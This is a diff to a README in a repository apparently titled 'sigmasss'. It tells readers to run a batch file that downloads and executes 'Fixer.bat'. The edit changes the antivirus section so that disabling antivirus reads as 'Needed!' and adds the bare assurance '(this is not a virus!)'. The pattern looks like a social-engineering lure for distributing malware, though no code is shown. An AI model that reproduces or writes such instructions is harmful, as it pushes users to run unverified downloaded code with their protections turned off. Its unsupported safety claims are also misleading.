NsShrixx/sigmasss/README.md

 2. Double-click the batch file to start the process.
 3. The batch file will automatically download `Fixer.bat` and run it for you.

-## Disabling Antivirus (If Necessary)
+## Disabling Antivirus (Needed!)
 Some antivirus programs may flag the **Fixer.bat** file as potentially harmful because it is not a well-known application.
-This is a common behavior for antivirus programs when encountering files that are not digitally signed or not from well-known sources.
+This is a common behavior for antivirus programs when encountering files that are not digitally signed or not from well-known sources (this is not a virus!).

 If you trust the source and are sure the file is safe, you may need to temporarily disable your antivirus software to allow the tool to run.